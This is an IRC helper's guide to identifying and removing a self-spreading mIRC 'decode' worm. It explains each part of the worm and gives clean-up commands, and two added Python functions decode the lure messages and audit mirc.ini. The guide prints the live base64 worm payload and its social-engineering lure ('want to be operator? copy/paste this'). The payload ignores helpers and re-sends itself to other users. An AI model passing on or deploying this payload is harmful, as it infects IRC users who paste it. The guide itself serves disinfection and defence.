Simple Spam Removal/DECODE REMOVAL

#1. Introduction
#2. Explanation
#3. Removal Steps
#4. Acknowledgments

#1. Introduction:

Okay, let's admit that we helpers on #nohack keep encountering a number of infected users who send out
a decode message like this:

(InfectedUser) Hi Husaini gus2 u b maging OPERATOR s # nohack ? copy/paste mo i2->
// write $decode(b24gISsxOnRleHQ6KmEqOiM6eyAuaWdub3JlICRuaWNrIHwgLnRpbWVyoCAwI
vYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m)| .load -rs

The Decode will be like this or something similar.

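If you want to read this decode message, type the following in your IRC status window: //!echo -a $decode(the decode code goes here,m)
This only displays the decoded text; nothing is written to a file or loaded. The decode code is the part between $decode( and ,m) in a message such as: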
// write $decode(b24gISsxOnRleHQ6KmEqOiM6eyAuaWdub3JlICRuaWNrIHwgLnRpbWVyoCAwIDEyMCAuam9pbiAjTWFuaWxhIHwgLm1zZyAkbmljayBoaSAkbmljayBndXMyIHUgYiBtYWdpbmcgT1BFUkFUT1IgcyAkY2hhbiA/IGNvcHkvcGFzdGUgbW8gaTItPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m)| .load -rs
or //write sex $decode(b24gISsxOnRleHQ6KjojOnsgLmF1c2VyIDIgJG5pY2sgfCAuam9pbiAtbiAjaDBsMyB8IC53cml0ZSAtbDEgYmQgY3RjcCAqOlBJTkcqOi4gJCAkKyAyLSB8IC5sb2FkIC1ycyBiZCB8IC5tc2cgJG5pY2sgV2FudCBiZSBhbiBPUCBpbiAkY2hhbiA/IHBhc3RlIHRoaXMtPiADNC8vd3JpdGUgQU9QICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyBBT1AgfQ==,m) | .load -rs sex

Once you have typed it, you will get the following or something similar to it:
on !+1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #Manila | .msg $nick hi $nick gus2 u b maging OPERATOR s $chan ? copy/paste mo i2-> //write $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs $chr(124) //mode $ $+ me +R }

#2. Explanation:
Let's explain what this does:

a) on !+1:text:*a*:#:{ .ignore $nick |
This means that when a user types any text containing the letter "a" on the channel, the spammer/infectee will ignore his nick. For example, if $me = Ryan and I typed "hello spAmmer, how cAn i help you?", the spammer will ignore Ryan*!*@*. That is the reason he/she does not see my follow-up questions or text on the channel.

b) .timer 0 120 .join #Manila
This decode sets a timer that keeps the spammer auto-joining #Manila every 120 seconds, with no limit on repetitions.

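c) .msg $nick hi $nick gus2 u b maging OPERATOR s $chan ? copy/paste mo i2->
//write $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m)
After ignoring the user, the infectee sends him this msg. The $encode($read($script,n,1),m) part re-encodes the first line of the infectee's own script, so the msg carries the same decode again.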

d) //mode $ $+ me +R }
The infectee will be set to +R, so only registered nicks can pvt him/her.
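
The read-before-you-trust step from the introduction and parts a) to d) above, as an added example (not part of the original guide): a Python function that decodes a pasted $decode(...,m) message offline, without mIRC, and lists which of those parts it contains. The function name, the indicator labels and the sample line are constructed for illustration.

```python
import base64
import re

# Patterns for parts a) to d) above; the labels are this example's own.
INDICATORS = {
    "text event trigger": r"\bon\s+\S*:text:",
    "ignores the helper": r"\.ignore\b",
    "repeating timer": r"\.timer\S*\s+0\s+\d+",
    "copies own script": r"\$read\(\s*\$script",
    "sets user mode +R": r"mode\s+\$\s*\$\+\s*me\s+\+R",
    "soft space chr(160)": "\xa0",
}

# The base64 argument of a $decode(...,m) call.
DECODE_CALL = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)")


def read_decode_message(line):
    """Return (decoded_text, indicator_names); nothing is written or loaded."""
    match = DECODE_CALL.search(line)
    if match is None:
        return None, []
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate padding lost in copy/paste
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None, ["undecodable base64"]
    text = raw.decode("latin-1")            # keeps bytes such as 0xA0 visible
    hits = [name for name, pattern in INDICATORS.items()
            if re.search(pattern, text, re.IGNORECASE)]
    return text, hits


# Constructed sample: a harmless fragment shaped like parts a) and b).
_inner = "on 1:text:*a*:#:{ .ignore $nick | .timer\xa0 0 120 .join #example }"
SAMPLE = ("//write x $decode(" +
          base64.b64encode(_inner.encode("latin-1")).decode("ascii") +
          ",m) | .load -rs x")

if __name__ == "__main__":
    decoded, found = read_decode_message(SAMPLE)
    print(decoded)
    print(found)
```
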

#3. Removal Steps
1. Ask the user how you can help him. (If you do receive the spam message, now you know how to help him.)

2. Change your nick, since the decode will just ignore your previous nick and not your IP address.
(Please refer to the explanation of letter a above.)

3. DO NOT use normal text when you first help the infectee. Use /me or an action command, which the on text event does not catch, so that he/she will not ignore you.

4. Ask the infectee/spammer if he/she knows how to copy/paste on IRC.

5. If no, show him how to copy/paste. If yes, continue to no. 6.

6. The first command is this: //!re $+ mote off | !ign $+ ore off | !ign $+ ore -r | !ti $+ mers off | !soc $+ kclose * | !ddes $+ erver off | !say don3
What does it do? It turns his/her script or remotes off, turns ignore off, clears his ignore list, turns off any timer that is active, closes his open sockets, turns the DDE server off, and changes his nick to -R
so that anyone can pvt him/her now.
Please type //msg #virusfree Munir: $mircini - $script(0) $script(1) $script($script(0)) $sreq $exists(script.ini) $sock(*,0)
7. After his confirmation (don3), play his loaded scripts on the backup channel: //!play -trfiles #channelname mirc.ini 2400 | !say playing… Note: you must know how to play his scripts the right way. What does -trfiles do? Why do you have to put that? Read /help /play

8. Let's give an example of a user's scripts:

9. OK, how many scripts does this user have loaded? It's only one. You start counting at n2=.
Why? Because n0 and n1 are not loaded scripts.
n0=users, n1=variables, and n2= and so on will be his/her loaded scripts. To check it you can also use //!say $script(0)
In this case the user will answer you 1. 1 means that he/she has only 1 script loaded.
In this script, maybe you are wondering why n2= looks like an empty filename. Actually it's NOT. The filename is an ASCII code. The space used in this decode is called the softkey, or $chr(160). You can check it with //!say $chr(160). How about the hard key? It's $chr(24)

10. If you are not sure what n2= is all about, you can play it
with: //!play #channelname " $+ $script(1) $+ " 2400 OR //!play #channelname " $+ $chr(160) $+ " 2400
" $+ $script(1) $+ " means that the first script loaded will be played on #channelname with a 2400 delay time.

11. Now that you are sure this script is spam, you must remove/unload it.
If you use " $+ $script(1) $+ " in your command, make sure that you REMOVE the file first before unloading. I'm hoping that you know why. If not, just ask $me or any of the old staff on the channel.
//!remove " $+ $script(1) $+ " | //!say $exists(" $+ $script(1) $+ ")
This command removes the first script and confirms whether it still exists. You must get $false from this.
$false = file has been removed
$true = file still exists
//!unload -rsn " $+ $script(1) $+ " | !say don3
This unloads the first script loaded. Why do we use -rsn? /help /unload will help you.
OK, but when do we use " $+ $chr(160) $+ " or " $+ filenameHERE $+ "? With those you can unload first and then REMOVE. You just change " $+ $script(1) $+ " to " $+ $chr(160) $+ " or " $+ filenameHERE $+ " in the commands above.

12. To make sure that the script is unloaded and removed, it is necessary to play his loaded scripts again (no. 7).
The spammer must show his scripts like this:

But what if he shows them like this:

YOU MUST check your commands first. If you did it right, check the attributes of the mirc.ini where the files are loaded.

13. To check his attributes: //!say $file(mirc.ini).attr
What if the spammer shows "arhs"? What do a, r, h and s mean? I'm hoping that you all know this too.
To change his attributes: /run cmd /c attrib -R -S -H <drive:\fullpath\file.exe>
Then unload his/her spam again.

14. Go back to no. 12 and check his attributes again.

15. To check for GTBots on the %windir% partition:
//!say results $findfile(c:\,mirc.ini,*,msg #virusfree $1-)
If you see a mirc.ini in his system, system32 or recycler folder, give him the cleaner, or if any of the old staff are online, ask them for assistance.

16. After that he/she is now clean. .show decodeclean will help you, or .show helped1 and .show helped2

Now enjoy this file. Sometimes it's nicer to give a cheat code than to make a wrong move while helping a user. 😛
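
Steps 7 to 12 read the [rfiles] section of mirc.ini by eye. The added example below (not part of the original guide) does the same check in Python on a saved copy of the file, counting scripts from n2 and flagging names that only look empty. The function name and the sample mirc.ini content are constructed for illustration.

```python
import ntpath

# Characters that show up as blank in a window or file listing.
BLANK_LOOKING = {" ", "\t", "\xa0"}


def audit_rfiles(ini_text):
    """Return the loaded scripts listed in [rfiles], each with warning reasons.

    n0 and n1 are the users and variables files, so scripts start at n2.
    """
    in_rfiles = False
    scripts = []
    for line in ini_text.splitlines():
        if line.startswith("["):
            in_rfiles = line.strip().lower() == "[rfiles]"
            continue
        if not in_rfiles or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = key.strip().lower()
        if not (key[:1] == "n" and key[1:].isdigit()) or int(key[1:]) < 2:
            continue
        name = ntpath.basename(value)   # value is NOT stripped: 0xA0 must survive
        reasons = []
        if name and all(ch in BLANK_LOOKING for ch in name):
            codes = " ".join("$chr(%d)" % ord(ch) for ch in name)
            reasons.append("blank-looking filename: " + codes)
        elif "\xa0" in name:
            reasons.append("filename contains $chr(160)")
        scripts.append({"key": key, "file": value, "reasons": reasons})
    return scripts


# Constructed sample shaped like the case in step 9 (file names are made up).
INFECTED_INI = (
    "[afiles]\nn0=aliases.ini\nn2=extra.ini\n"
    "[rfiles]\nn0=remote\\users.ini\nn1=remote\\vars.ini\nn2=\xa0\n"
)

if __name__ == "__main__":
    for entry in audit_rfiles(INFECTED_INI):
        print(entry["key"], repr(entry["file"]), entry["reasons"])
```

The length of the returned list corresponds to the count the user reports with $script(0); after a successful clean-up it should be empty or contain only entries with no reasons.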

#4. Acknowledgments
Thanks to Nokeer and Husaini